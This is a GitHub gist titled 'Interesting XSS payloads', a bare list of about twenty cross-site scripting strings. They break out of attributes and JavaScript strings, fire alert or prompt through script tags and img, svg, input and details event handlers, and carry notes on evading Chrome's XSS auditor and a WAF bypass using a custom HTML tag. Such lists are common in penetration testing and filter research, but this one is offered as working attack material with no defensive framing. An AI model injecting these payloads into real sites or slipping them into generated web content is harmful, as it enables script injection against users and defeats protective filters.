Skip to content

Instantly share code, notes, and snippets.

@thomashartm
Last active April 20, 2025 19:45
Show Gist options
  • Save thomashartm/841594a062aea88177b5892a2458ca7a to your computer and use it in GitHub Desktop.
Save thomashartm/841594a062aea88177b5892a2458ca7a to your computer and use it in GitHub Desktop.
Interesting XSS payloads
CUSTOM VECTORS
"><img src=x onerror=prompt(1);>
+123'];alert(1);[['
123',alert(1),'
123\",term:alert(1)//\"
123";alert`1`;//
123'';!--"<XSS>=&{()}
<script>alert(1)</script>
')"+onMouseOver=alert(1)+onx=(
// chrome xss auditor evasion
<img src= ?itworksonchrome? onerror = alert(1);'???'>
"><img src="x:x" onerror=alert('xss')>
"><svg+onload=prompt`xss`+>
"><input onfocus=alert('xss') autofocus><"
<details ontoggle=alert`xss`><summary>Click me to demonstrate the XSS</summary></details>
<svg onload=alert(1)>
<svg+onload=alert(1)>
<img src=x onerror=alert(1)>
<img+src=x+onerror=alert`1`>
<!-- waf bypass by using a custom html tag -->
<whatever/onpointerover='var a=alert;a(1)'>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment